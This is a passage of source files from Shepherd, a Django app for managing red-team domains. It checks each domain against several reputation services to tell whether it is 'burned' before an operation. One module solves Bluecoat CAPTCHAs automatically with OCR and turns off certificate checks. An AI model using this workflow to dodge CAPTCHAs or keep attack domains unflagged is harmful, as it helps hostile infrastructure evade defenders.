mx_records:\n dns_records_string += 'MX: %s ::: ' % mx_records\n if dmarc_record:\n dns_records_string += 'DMARC: %s ::: ' % dmarc_record\n else:\n dns_records_string += 'DMARC: MX configured without a DMARC record! ::: '\n if txt_records:\n dns_records_string += 'TXT: %s ::: ' % txt_records\n if soa_records:\n dns_records_string += 'SOA: %s ::: ' % soa_records\n except:\n dns_records_string = 'None'\n # Look-up the individual domain and save the new record string for that domain\n domain_instance = Domain.objects.get(name=domain.name)\n domain_instance.dns_record = dns_records_string\n domain_instance.save()\n\n"
},
{
"alpha_fraction": 0.7470398545265198,
"alphanum_fraction": 0.7491926550865173,
"avg_line_length": 34.730770111083984,
"blob_id": "df34587365067a5b344683d215f1bee8d01fc0cb",
"content_id": "0d74061f6556bc1de1d9722a92a50cc6a66703be",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 929,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 26,
"path": "/shepherd/urls.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the URL mappings for the main Shepherd application. The `urlpatterns` list\nroutes URLs to views. For more information please see:\n\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\n\"\"\"\n\nfrom django.urls import path\nfrom django.urls import include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('catalog/', include('catalog.urls')),\n path('', RedirectView.as_view(url='/catalog/', permanent=True)),\n]\n\n# Use static() to add url mapping to serve static files during development (only)\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n# Add Django site authentication urls (for login, logout, password management)\nurlpatterns += [\n path('accounts/', include('django.contrib.auth.urls')),\n]\n"
},
{
"alpha_fraction": 0.5657722353935242,
"alphanum_fraction": 0.5719793438911438,
"avg_line_length": 51.82688522338867,
"blob_id": "ea033c271a16dcb56437c31a55057c1d65e2fd29",
"content_id": "299a377cabdb92bd2a14558487cb17345a7124e9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25938,
"license_type": "permissive",
"max_line_length": 154,
"num_lines": 491,
"path": "/modules/review.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"This class accepts a list of domains from a provided Django query set and then\nreviews each one to ensure it is ready to be used for an op. This involves checking to see if\nthe domain is properly categorized, the domain has not been flagged in VirusTotal or tagged\nwith a bad category, and the domain is not blacklisted for spam.\n\nDomainReview checks the domain against VirusTotal, Cisco Talos, Bluecoat, IBM X-Force, Fortiguard, \nTrendMicro, OpeDNS, and MXToolbox. Domains will also be checked against malwaredomains.com's list\nof reported domains.\n\"\"\"\n\nimport os\nimport re\nimport csv\nimport sys\nimport json\nimport shutil\nimport base64\nfrom time import sleep\n\nfrom django.conf import settings\nfrom catalog.models import Domain\n\nimport requests\nimport pytesseract\nfrom PIL import Image\nfrom lxml import etree\nfrom lxml import objectify\nfrom cymon import Cymon\nfrom bs4 import BeautifulSoup\n\n\n# Disable requests warnings for things like disabling certificate checking\nrequests.packages.urllib3.disable_warnings()\n\n\nclass DomainReview(object):\n \"\"\"Class to pull a list of registered domains belonging to a Namecheap account and then check\n the web reputation of each domain.\n \"\"\"\n # API endpoints\n malwaredomains_url = 'http://mirror1.malwaredomains.com/files/justdomains'\n virustotal_domain_report_uri = 'https://www.virustotal.com/vtapi/v2/domain/report?apikey={}&domain={}'\n # Categories we don't want to see\n # These are lowercase to avoid inconsistencies with how each service might return the categories\n blacklisted = ['phishing', 'web ads/analytics', 'suspicious', 'shopping', 'placeholders', \n 'pornography', 'spam', 'gambling', 'scam/questionable/illegal', \n 'malicious sources/malnets']\n # Variables for web browsing\n useragent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'\n session = requests.Session()\n\n def __init__(self, domain_queryset):\n \"\"\"Everything that needs to be setup when a new DomainReview object is created goes here.\"\"\"\n # Domain query results from the Django models\n self.domain_queryset = domain_queryset\n # Try to get the sleep time configured in settings\n try:\n self.request_delay = settings.DOMAINCHECK_CONFIG['sleep_time']\n except Exception as error:\n self.request_delay = 20\n \n try:\n self.virustotal_api_key = settings.DOMAINCHECK_CONFIG['virustotal_api_key']\n except Exception as error:\n self.virustotal_api_key = None\n print('[!] A VirusTotal API key could not be pulled from settings.py. Review settings to perform VirusTotal checks.')\n exit()\n\n def check_virustotal(self, domain, ignore_case=False):\n \"\"\"Check the provided domain name with VirusTotal. VirusTotal's API is case sensitive, so\n the domain will be converted to lowercase by default. 
This can be disabled using the\n ignore_case parameter.\n\n This uses the VirusTotal /domain/report endpoint:\n\n https://developers.virustotal.com/v2.0/reference#domain-report\n \"\"\"\n if self.virustotal_api_key:\n if not ignore_case:\n domain = domain.lower()\n try:\n req = self.session.get(self.virustotal_domain_report_uri.format(self.virustotal_api_key, domain))\n vt_data = req.json()\n except:\n vt_data = None\n return vt_data\n else:\n return None\n\n def check_talos(self, domain):\n \"\"\"Check the provided domain's category as determined by Cisco Talos.\"\"\"\n categories = []\n cisco_talos_uri = 'https://talosintelligence.com/sb_api/query_lookup?query=%2Fapi%2Fv2%2Fdetails%2Fdomain%2F&query_entry={}&offset=0&order=ip+asc'\n headers = {'User-Agent': self.useragent, \n 'Referer': 'https://www.talosintelligence.com/reputation_center/lookup?search=' + domain}\n try:\n req = self.session.get(cisco_talos_uri.format(domain), headers=headers)\n if req.ok:\n json_data = req.json()\n category = json_data['category']\n if category:\n categories.append(json_data['category']['description'])\n else:\n categories.append('Uncategorized')\n else:\n print('[!] Cisco Talos check request failed. Talos did not return a 200 response.')\n print('L.. Request returned status \"{}\"'.format(req.status_code))\n except Exception as error:\n print('[!] Cisco Talos request failed: {}'.format(error))\n return categories\n\n def check_ibm_xforce(self, domain):\n \"\"\"Check the provided domain's category as determined by IBM X-Force.\"\"\"\n categories = []\n xforce_uri = 'https://exchange.xforce.ibmcloud.com/url/{}'.format(domain)\n headers = {'User-Agent': self.useragent, \n 'Accept': 'application/json, text/plain, */*', \n 'x-ui': 'XFE', \n 'Origin': xforce_uri, \n 'Referer': xforce_uri}\n xforce_api_uri = 'https://api.xforce.ibmcloud.com/url/{}'.format(domain)\n try:\n req = self.session.get(xforce_api_uri, headers=headers, verify=False)\n if req.ok:\n response = req.json()\n if not response['result']['cats']:\n categories.append('Uncategorized')\n else:\n temp = ''\n # Parse all dictionary keys and append to single string to get Category names\n for key in response['result']['cats']:\n categories.append(key)\n # IBM X-Force returns a 404 with {\"error\":\"Not found.\"} if the domain is unknown\n elif req.status_code == 404:\n categories.append('Unknown')\n else:\n print('[!] IBM X-Force check request failed. X-Force did not return a 200 response.')\n print('L.. Request returned status \"{}\"'.format(req.status_code))\n except:\n print('[!] IBM X-Force request failed: {}'.format(error))\n return categories\n\n def check_fortiguard(self, domain):\n \"\"\"Check the provided domain's category as determined by Fortiguard Webfilter.\"\"\"\n categories = []\n fortiguard_uri = 'https://fortiguard.com/webfilter?q=' + domain\n headers = {'User-Agent': self.useragent, \n 'Origin': 'https://fortiguard.com', \n 'Referer': 'https://fortiguard.com/webfilter'}\n try:\n req = self.session.get(fortiguard_uri, headers=headers)\n if req.ok:\n \"\"\"\n Example HTML result:\n <div class=\"well\">\n <div class=\"row\">\n <div class=\"col-md-9 col-sm-12\">\n <h4 class=\"info_title\">Category: Education</h4>\n \"\"\"\n # TODO: Might be best to BS4 for this rather than regex\n cat = re.findall('Category: (.*?)\" />', req.text, re.DOTALL)\n categories.append(cat[0])\n else:\n print('[!] Fortiguard check request failed. Fortiguard did not return a 200 response.')\n print('L.. 
Request returned status \"{}\"'.format(req.status_code))\n        except Exception as error:\n            print('[!] Fortiguard request failed: {}'.format(error))\n        return categories\n\n    def check_bluecoat(self, domain, ocr=True):\n        \"\"\"Check the provided domain's category as determined by Symantec Bluecoat.\"\"\"\n        categories = []\n        bluecoat_uri = 'https://sitereview.bluecoat.com/resource/lookup'\n        post_data = {'url': domain, 'captcha': ''}\n        headers = {'User-Agent': self.useragent, \n                   'Content-Type': 'application/json; charset=UTF-8', \n                   'Referer': 'https://sitereview.bluecoat.com/lookup'}\n        try:\n            response = self.session.post(bluecoat_uri, headers=headers, json=post_data, verify=False)\n            root = etree.fromstring(response.text)\n            for node in root.xpath('//CategorizationResult//categorization//categorization//name'):\n                categories.append(node.text)\n            if 'captcha' in categories:\n                if ocr:\n                    # This request is also performed by a browser, but is not needed for our purposes\n                    print('[*] Received a CAPTCHA challenge from Bluecoat...')\n                    captcha = self.solve_captcha('https://sitereview.bluecoat.com/resource/captcha.jpg', self.session)\n                    if captcha:\n                        b64captcha = base64.urlsafe_b64encode(captcha.encode('utf-8')).decode('utf-8')\n                        # Send CAPTCHA solution via GET since inclusion with the domain categorization request doesn't work anymore\n                        print('[*] Submitting an OCRed CAPTCHA text to Bluecoat...')\n                        captcha_solution_url = 'https://sitereview.bluecoat.com/resource/captcha-request/{0}'.format(b64captcha)\n                        response = self.session.get(url=captcha_solution_url, headers=headers, verify=False)\n                        # Try the categorization request again\n                        response = self.session.post(bluecoat_uri, headers=headers, json=post_data, verify=False)\n                        response_json = json.loads(response.text)\n                        if 'errorType' in response_json:\n                            print('[!] CAPTCHA submission was apparently incorrect!')\n                            categories = [response_json['errorType']]\n                        else:\n                            print('[!] CAPTCHA submission was accepted!')\n                            categories = [response_json['categorization'][0]['name']]\n                    else:\n                        print('[!] Failed to solve BlueCoat CAPTCHA with OCR. Manually solve at: \"https://sitereview.bluecoat.com/sitereview.jsp\"')\n                else:\n                    print('[!] Received a Bluecoat CAPTCHA and OCR is disabled. Manually solve at: \"https://sitereview.bluecoat.com/sitereview.jsp\"')\n        except Exception as error:\n            print('[!] Bluecoat request failed: {0}'.format(error))\n        return categories\n\n    def solve_captcha(self, url, session):\n        \"\"\"Solve a Bluecoat CAPTCHA for the provided session.\"\"\"\n        # Downloads CAPTCHA image and saves to current directory for OCR with Tesseract\n        # Returns CAPTCHA string or False if error occurred\n        jpeg = 'captcha.jpg'\n        headers = {'User-Agent':self.useragent}\n        try:\n            response = session.get(url=url, headers=headers, verify=False, stream=True)\n            if response.status_code == 200:\n                with open(jpeg, 'wb') as f:\n                    response.raw.decode_content = True\n                    shutil.copyfileobj(response.raw, f)\n            else:\n                print('[!] Failed to download the Bluecoat CAPTCHA.')\n                return False\n            # Perform basic OCR without additional image enhancement\n            text = pytesseract.image_to_string(Image.open(jpeg))\n            text = text.replace(\" \", \"\").replace(\"[\", \"l\").replace(\"'\", \"\")\n            # Remove CAPTCHA file\n            try:\n                os.remove(jpeg)\n            except OSError:\n                pass\n            return text\n        except Exception as error:\n            print('[!] 
Error processing the Bluecoat CAPTCHA.'.format(error))\n return False\n\n def check_mxtoolbox(self, domain):\n \"\"\"Check if the provided domain is blacklisted as spam as determined by MX Toolkit.\"\"\"\n issues = []\n mxtoolbox_url = 'https://mxtoolbox.com/Public/Tools/BrandReputation.aspx'\n headers = {'User-Agent': self.useragent, \n 'Origin': mxtoolbox_url, \n 'Referer': mxtoolbox_url} \n try:\n response = self.session.get(url=mxtoolbox_url, headers=headers)\n soup = BeautifulSoup(response.content, 'lxml')\n viewstate = soup.select('input[name=__VIEWSTATE]')[0]['value']\n viewstategenerator = soup.select('input[name=__VIEWSTATEGENERATOR]')[0]['value']\n eventvalidation = soup.select('input[name=__EVENTVALIDATION]')[0]['value']\n data = {\n '__EVENTTARGET': '', \n '__EVENTARGUMENT': '', \n '__VIEWSTATE': viewstate, \n '__VIEWSTATEGENERATOR': viewstategenerator, \n '__EVENTVALIDATION': eventvalidation, \n 'ctl00$ContentPlaceHolder1$brandReputationUrl': domain, \n 'ctl00$ContentPlaceHolder1$brandReputationDoLookup': 'Brand Reputation Lookup', \n 'ctl00$ucSignIn$hfRegCode': 'missing', \n 'ctl00$ucSignIn$hfRedirectSignUp': '/Public/Tools/BrandReputation.aspx', \n 'ctl00$ucSignIn$hfRedirectLogin': '', \n 'ctl00$ucSignIn$txtEmailAddress': '', \n 'ctl00$ucSignIn$cbNewAccount': 'cbNewAccount', \n 'ctl00$ucSignIn$txtFullName': '', \n 'ctl00$ucSignIn$txtModalNewPassword': '', \n 'ctl00$ucSignIn$txtPhone': '', \n 'ctl00$ucSignIn$txtCompanyName': '', \n 'ctl00$ucSignIn$drpTitle': '', \n 'ctl00$ucSignIn$txtTitleName': '', \n 'ctl00$ucSignIn$txtModalPassword': ''\n }\n response = self.session.post(url=mxtoolbox_url, headers=headers, data=data)\n soup = BeautifulSoup(response.content, 'lxml')\n if soup.select('div[id=ctl00_ContentPlaceHolder1_noIssuesFound]'):\n issues.append('No issues found')\n else:\n if soup.select('div[id=ctl00_ContentPlaceHolder1_googleSafeBrowsingIssuesFound]'):\n issues.append('Google SafeBrowsing Issues Found.')\n if soup.select('div[id=ctl00_ContentPlaceHolder1_phishTankIssuesFound]'):\n issues.append('PhishTank Issues Found')\n except Exception as error:\n print('[!] Error retrieving Google SafeBrowsing and PhishTank reputation!')\n return issues\n\n def check_cymon(self, target):\n \"\"\"Get reputation data from Cymon.io for target IP address. This returns two dictionaries\n for domains and security events.\n\n A Cymon API key is not required, but is recommended.\n \"\"\"\n try:\n req = self.session.get(url='https://cymon.io/' + target, verify=False)\n if req.status_code == 200:\n if 'IP Not Found' in req.text:\n return False\n else:\n return True\n else:\n return False\n except Exception:\n return False\n\n def check_opendns(self, domain):\n \"\"\"Check the provided domain's category as determined by the OpenDNS community.\"\"\"\n categories = []\n opendns_uri = 'https://domain.opendns.com/{}'\n headers = {'User-Agent':self.useragent}\n try:\n response = self.session.get(opendns_uri.format(domain), headers=headers, verify=False)\n soup = BeautifulSoup(response.content, 'lxml')\n tags = soup.find('span', {'class': 'normal'})\n if tags:\n categories = tags.text.strip().split(', ')\n else:\n categories.append('No Tags')\n except Exception as error:\n print('[!] 
OpenDNS request failed: {0}'.format(error))\n return categories\n\n def check_trendmicro(self, domain):\n \"\"\"Check the provided domain's category as determined by the Trend Micro.\"\"\"\n categories = []\n trendmicro_uri = 'https://global.sitesafety.trendmicro.com/'\n trendmicro_stage_1_uri = 'https://global.sitesafety.trendmicro.com/lib/idn.php'\n trendmicro_stage_2_uri = 'https://global.sitesafety.trendmicro.com/result.php'\n headers = {'User-Agent': self.useragent}\n headers_stage_1 = {\n 'Host': 'global.sitesafety.trendmicro.com', \n 'Accept': '*/*', \n 'Origin': 'https://global.sitesafety.trendmicro.com', \n 'X-Requested-With': 'XMLHttpRequest', \n 'User-Agent': self.useragent, \n 'Content-Type': 'application/x-www-form-urlencoded', \n 'Referer': 'https://global.sitesafety.trendmicro.com/index.php', \n 'Accept-Encoding': 'gzip, deflate', \n 'Accept-Language': 'en-US, en;q=0.9'\n }\n headers_stage_2 = {\n 'Origin': 'https://global.sitesafety.trendmicro.com', \n 'Content-Type': 'application/x-www-form-urlencoded', \n 'User-Agent': self.useragent, \n 'Accept': 'text/html, application/xhtml+xml, application/xml;q=0.9, image/webp, image/apng, */*;q=0.8', \n 'Referer': 'https://global.sitesafety.trendmicro.com/index.php', \n 'Accept-Encoding': 'gzip, deflate', \n 'Accept-Language': 'en-US, en;q=0.9'\n }\n data_stage_1 = {'url': domain}\n data_stage_2 = {'urlname': domain, \n 'getinfo': 'Check Now'\n }\n try:\n response = self.session.get(trendmicro_uri, headers=headers)\n response = self.session.post(trendmicro_stage_1_uri, headers=headers_stage_1, data=data_stage_1)\n response = self.session.post(trendmicro_stage_2_uri, headers=headers_stage_2, data=data_stage_2)\n # Check if session was redirected to /captcha.php\n if 'captcha' in response.url:\n print('[!] TrendMicro responded with a reCAPTCHA, so cannot proceed with TrendMicro.')\n print('L.. You can try solving it yourself: https://global.sitesafety.trendmicro.com/captcha.php')\n else:\n soup = BeautifulSoup(response.content, 'lxml')\n tags = soup.find('div', {'class': 'labeltitlesmallresult'})\n if tags:\n categories = tags.text.strip().split(', ')\n else:\n categories.append('Uncategorized')\n except Exception as error:\n print('[!] Trend Micro request failed: {0}'.format(error))\n return categories\n\n def download_malware_domains(self):\n \"\"\"Downloads the malwaredomains.com list of malicious domains.\"\"\"\n headers = {'User-Agent':self.useragent}\n response = self.session.get(url=self.malwaredomains_url, headers=headers, verify=False)\n malware_domains = response.text\n if response.status_code == 200:\n return malware_domains\n else:\n print('[!] Error reaching: {}, Status: {}'.format(self.malwaredomains_url, response.status_code))\n return None\n\n def check_domain_status(self):\n \"\"\"Check the status of each domain in the provided list collected from the Domain model.\n Each domain will be checked to ensure the domain is not flagged/blacklisted. A domain\n will be considered burned if VirusTotal returns detections for the domain or one of the\n domain's categories appears in the list of bad categories.\n\n VirusTotal allows 4 requests every 1 minute. 
A minimum of 20 seconds is recommended to\n        allow for some consideration on the service.\n\n        \"\"\"\n        lab_results = {}\n        malware_domains = self.download_malware_domains()\n        for domain in self.domain_queryset:\n            print('[+] Starting update of {}'.format(domain.name))\n            burned_dns = False\n            domain_categories = []\n            # Sort the domain information from queryset\n            domain_name = domain.name\n            health = str(domain.health_status)\n            # Check if domain is known to be burned and skip it if so\n            # This just saves time and operators can edit a domain and set status to `Healthy` as needed\n            # The domain will be included in the next update after the edit\n            if health != 'Healthy':\n                burned = True\n            else:\n                burned = False\n            if not burned:\n                burned_explanations = []\n                # Check if domain is flagged for malware\n                if malware_domains:\n                    if domain_name in malware_domains:\n                        print('[!] {}: Identified as a known malware domain (malwaredomains.com)!'.format(domain_name))\n                        burned = True\n                        burned_explanations.append('Flagged by malwaredomains.com')\n                # Check domain name with VirusTotal\n                vt_results = self.check_virustotal(domain_name)\n                # check_virustotal() returns None if the request failed, so fall back to an empty dict\n                if vt_results is None:\n                    vt_results = {}\n                if 'categories' in vt_results:\n                    domain_categories = vt_results['categories']\n                # Check if VirusTotal has any detections for URLs or samples\n                if 'detected_downloaded_samples' in vt_results:\n                    if len(vt_results['detected_downloaded_samples']) > 0:\n                        print('[!] {}: Identified as having a downloaded sample on VirusTotal!'.format(domain_name))\n                        burned = True\n                        burned_explanations.append('Tied to a VirusTotal detected malware sample')\n                if 'detected_urls' in vt_results:\n                    if len(vt_results['detected_urls']) > 0:\n                        print('[!] {}: Identified as having a URL detection on VirusTotal!'.format(domain_name))\n                        burned = True\n                        burned_explanations.append('Tied to a VirusTotal detected URL')\n                # Get passive DNS results from VirusTotal JSON\n                ip_addresses = []\n                if 'resolutions' in vt_results:\n                    for address in vt_results['resolutions']:\n                        ip_addresses.append({'address':address['ip_address'], 'timestamp':address['last_resolved'].split(' ')[0]})\n                bad_addresses = []\n                for address in ip_addresses:\n                    if self.check_cymon(address['address']):\n                        burned_dns = True\n                        bad_addresses.append(address['address'] + '/' + address['timestamp'])\n                if burned_dns:\n                    print('[*] {}: Identified as pointing to suspect IP addresses (VirusTotal passive DNS).'.format(domain_name))\n                    health_dns = 'Flagged DNS ({})'.format(', '.join(bad_addresses))\n                else:\n                    health_dns = \"Healthy\"\n                # Collect categories from the other sources\n                xforce_results = self.check_ibm_xforce(domain_name)\n                domain_categories.extend(xforce_results)\n                talos_results = self.check_talos(domain_name)\n                domain_categories.extend(talos_results)\n                bluecoat_results = self.check_bluecoat(domain_name)\n                domain_categories.extend(bluecoat_results)\n                fortiguard_results = self.check_fortiguard(domain_name)\n                domain_categories.extend(fortiguard_results)\n                opendns_results = self.check_opendns(domain_name)\n                domain_categories.extend(opendns_results)\n                trendmicro_results = self.check_trendmicro(domain_name)\n                domain_categories.extend(trendmicro_results)\n                mxtoolbox_results = self.check_mxtoolbox(domain_name)\n                domain_categories.extend(mxtoolbox_results)\n                # Make categories unique\n                domain_categories = list(set(domain_categories))\n                # Check if any categories are suspect\n                bad_categories = []\n                for category in domain_categories:\n                    if category.lower() in self.blacklisted:\n                        bad_categories.append(category.capitalize())\n                if bad_categories:\n                    burned = True\n                    
burned_explanations.append('Tagged with a bad category')\n                # Assemble the dictionary to return for this domain\n                # Note: domains skipped above (already burned) are omitted from the results\n                lab_results[domain] = {}\n                lab_results[domain]['categories'] = {}\n                lab_results[domain]['burned'] = burned\n                lab_results[domain]['burned_explanation'] = ', '.join(burned_explanations)\n                lab_results[domain]['health_dns'] = health_dns\n                lab_results[domain]['categories']['all'] = ', '.join(domain_categories)\n                lab_results[domain]['categories']['bad'] = ', '.join(bad_categories)\n                lab_results[domain]['categories']['talos'] = ', '.join(talos_results)\n                lab_results[domain]['categories']['xforce'] = ', '.join(xforce_results)\n                lab_results[domain]['categories']['opendns'] = ', '.join(opendns_results)\n                lab_results[domain]['categories']['bluecoat'] = ', '.join(bluecoat_results)\n                lab_results[domain]['categories']['mxtoolbox'] = ', '.join(mxtoolbox_results)\n                lab_results[domain]['categories']['fortiguard'] = ', '.join(fortiguard_results)\n                lab_results[domain]['categories']['trendmicro'] = ', '.join(trendmicro_results)\n                # Sleep for a while for VirusTotal's API\n                sleep(self.request_delay)\n        return lab_results\n"
},
{
"alpha_fraction": 0.6946293711662292,
"alphanum_fraction": 0.6955170631408691,
"avg_line_length": 42.346153259277344,
"blob_id": "b6a01ad4f3a8e5029d6f4b16e8e8df145d305290",
"content_id": "623875d6de0ff1b580bac6ef7afd1f464add3041",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2253,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 52,
"path": "/catalog/urls.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the URL mappings for the catalog application. The `urlpatterns` list\nroutes URLs to views. For more information please see:\n\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\n\"\"\"\n\nfrom . import views\nfrom django.conf.urls import include\nfrom django.urls import path, re_path\n\n\n# URLs for the basic domain views\nurlpatterns = [\n path('', views.index, name='index'),\n path('domains/', views.DomainListView.as_view(), name='domains'),\n path('avail_domains/', views.AvailDomainListView.as_view(), name='available-domains'),\n path('active_domains/', views.ActiveDomainListView.as_view(), name='active-domains'),\n path('res_domains/', views.ResDomainListView.as_view(), name='reserved-domains'),\n path('graveyard/', views.GraveyardListView.as_view(), name='graveyard'),\n path('domain/<int:pk>', views.DomainDetailView.as_view(), name='domain-detail'),\n path('mydomains/', views.ActiveDomainsByUserListView.as_view(), name='my-domains'),\n path('error/', views.error, name='error'),\n path('profile/', views.profile, name='profile'),\n]\n\n# URLs for creating, updating, and deleting project histories\nurlpatterns += [\n path('history/<int:pk>/create/', views.HistoryCreate.as_view(), name='history_create'),\n path('history/<int:pk>/update/', views.HistoryUpdate.as_view(), name='history_update'),\n path('history/<int:pk>/delete/', views.HistoryDelete.as_view(), name='history_delete'),\n]\n\n# URLs for creating, updating, and deleting domains\nurlpatterns += [\n path('domain/create/', views.DomainCreate.as_view(), name='domain_create'),\n path('domain/<int:pk>/update/', views.DomainUpdate.as_view(), name='domain_update'),\n path('domain/<int:pk>/delete/', views.DomainDelete.as_view(), name='domain_delete'),\n]\n\n# URLs for domain status change functions\nurlpatterns += [\n path('checkout/<int:pk>', views.checkout, name='checkout'),\n path('release/<int:pk>', views.release, name='release'),\n]\n\n# URLs for management functions\nurlpatterns += [\n path('management/', views.management, name='management'),\n path('update/', views.update, name='update'),\n path('update_dns/', views.update_dns, name='update_dns'),\n path('upload/csv/', views.upload_csv, name='upload_csv'),\n]"
},
{
"alpha_fraction": 0.6339143514633179,
"alphanum_fraction": 0.636082112789154,
"avg_line_length": 43.76039505004883,
"blob_id": "89c6f653be6bf982eb3b13b7e8fe5e29985b9db5",
"content_id": "4b4e91b6e52a2887012ac1d5a0d83758ccf67194",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22604,
"license_type": "permissive",
"max_line_length": 155,
"num_lines": 505,
"path": "/catalog/views.py",
"repo_name": "fastlorenzo/Shepherd",
"src_encoding": "UTF-8",
"text": "\"\"\"This contains all of the views for the catalog application's various webpages.\"\"\"\n\n# Import logging functionality\nimport logging\n\n# Django imports for generic views and template rendering\nfrom django.views import generic\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import CreateView, UpdateView, DeleteView\n\n# Django imports for verifying a user is logged-in to access a view\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n# Django imports for verifying a user's permissions before accessing a function\nfrom django.contrib.auth.decorators import permission_required\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\n\n# Django imports for forms\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\n\n# Django Q imports for task management\nfrom django_q.tasks import async_task, result\n\n# Import for references to Django's settings.py\nfrom django.conf import settings\n\n# Import the catalog application's models\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom catalog.forms import CheckoutForm, DomainCreateForm\nfrom catalog.models import Domain, HealthStatus, DomainStatus, WhoisStatus, Client, History, User\n\n# Import the Django-Q models\nfrom django_q.models import Success, Task\n\n# Import Python libraries for various things\nimport csv\nimport codecs\nimport datetime\nfrom io import StringIO\nfrom io import TextIOWrapper\n\n\n# Setup logger\nlogger = logging.getLogger(__name__)\n\n\n##################\n# View Functions #\n##################\n\ndef index(request):\n \"\"\"View function for the home page, index.html.\"\"\"\n # Generate counts of some of the main objects\n num_domains = Domain.objects.all().count()\n # Get counts of domains for each status\n num_domains_burned = Domain.objects.filter(domain_status__domain_status='Burned').count()\n num_domains_reserved = Domain.objects.filter(domain_status__domain_status='Reserved').count()\n num_domains_available = Domain.objects.filter(domain_status__domain_status='Available').count()\n num_domains_unavailable = Domain.objects.filter(domain_status__domain_status='Unavailable').count()\n # If the user is authenticated, get the number of checked-out domains\n if request.user.is_authenticated:\n num_domains_out = History.objects.filter(operator=request.user,\n domain__domain_status__domain_status='Unavailable',\n end_date__gte=datetime.datetime.now()).count()\n else:\n num_domains_out = None\n # Prepare the context for index.html\n context = {\n 'num_domains': num_domains,\n 'num_domains_out': num_domains_out,\n 'num_domains_burned': num_domains_burned,\n 'num_domains_reserved': num_domains_reserved,\n 'num_domains_available': num_domains_available,\n 'num_domains_unavailable': num_domains_unavailable,\n }\n # Render the HTML template index.html with the data in the context variable\n return render(request, 'index.html', context=context)\n\ndef error(request, error):\n \"\"\"View function for the error page, error.html. 
The error message passed to this view will\n be displayed on error.html.\n \"\"\"\n # Prepare the context for the error page\n context = {\n 'error_message': error,\n }\n # Generate counts of some of the main objects\n return render(request, 'catalog/error.html', context=context)\n\n@login_required\ndef profile(request):\n \"\"\"View function for the user profile, profile.html.\"\"\"\n # Get the current user's user object\n user = request.user\n # Look-up the username in the database\n current_user = User.objects.get(username=user.username)\n # Pass the results to the template\n return render(request, 'catalog/profile.html', {'current_user': current_user})\n\n@login_required\ndef checkout(request, pk):\n \"\"\"View function for domain checkout. The Primary Key passed to this view is used to look-up\n the requested domain.\n \"\"\"\n # Fetch the domain for the provided primary key\n domain_instance = get_object_or_404(Domain, pk=pk)\n # If this is a POST request then process the form data\n if request.method == 'POST':\n # Create a form instance and populate it with data from the request (binding):\n form = CheckoutForm(request.POST)\n # Check if the form is valid\n if form.is_valid():\n # Check if client exists and create it if not\n # TODO:\n # Change this to tie into a client manager\n # In the future this will be a dropdown or typeahead field\n client_name = form.cleaned_data['client']\n client = Client.objects.get(name__iexact=client_name)\n if not client:\n client_instance = Client(name=client_name)\n client_instance.save()\n client = Client.objects.get(name__iexact=client_name)\n # Process the data in form.cleaned_data as required\n history_instance = History(start_date=form.cleaned_data['start_date'],\n end_date=form.cleaned_data['end_date'],\n activity_type=form.cleaned_data['activity'],\n project_type=form.cleaned_data['project_type'],\n note=form.cleaned_data['note'],\n client=client,\n operator=request.user,\n domain=Domain.objects.get(pk=pk))\n # Commit the new project history\n history_instance.save()\n # Update the domain status and commit it\n domain_instance.domain_status = DomainStatus.objects.get(domain_status='Unavailable')\n domain_instance.last_used_by = request.user\n domain_instance.save()\n # Redirect to the user's checked-out domains\n return HttpResponseRedirect(reverse('my-domains'))\n # If this is a GET (or any other method) create the default form\n else:\n form = CheckoutForm(request.POST)\n # Prepare the context for the checkout form\n context = {\n 'form': form,\n 'domain_instance': domain_instance,\n 'domain_name': domain_instance.name\n }\n # Render the checkout form page\n return render(request, 'catalog/checkout.html', context)\n\n@login_required\ndef release(request, pk):\n \"\"\"View function for releasing a domain back to the pool. 
The Primary Key passed to this view is used to look up\n    the requested domain.\n    \"\"\"\n    # Fetch the domain for the provided primary key\n    domain_instance = get_object_or_404(Domain, pk=pk)\n    # If this is a GET request then check if domain can be released\n    if request.method == 'GET':\n        # Allow the action if the current user is the one who checked out the domain\n        if request.user == domain_instance.last_used_by:\n            # Reset domain status to `Available` and commit the change\n            domain_instance.domain_status = DomainStatus.objects.get(domain_status='Available')\n            domain_instance.save()\n            # Redirect to the user's checked-out domains\n            return HttpResponseRedirect(reverse('my-domains'))\n        # Otherwise return an error message via error.html\n        else:\n            context = {\n                'error_message': 'Your user account does not match the user that has checked out this domain, so you are not authorized to release it.'\n            }\n            return render(request, 'catalog/error.html', context)\n    # If this is a POST (or any other method) redirect\n    else:\n        return HttpResponseRedirect(reverse('my-domains'))\n\n@login_required\ndef upload_csv(request):\n    \"\"\"View function for uploading and processing csv files and importing domain names.\"\"\"\n    # If the request is 'GET' return the upload page\n    if request.method == 'GET':\n        return render(request, 'catalog/upload_csv.html')\n    # If not a GET, then proceed\n    try:\n        # Get the 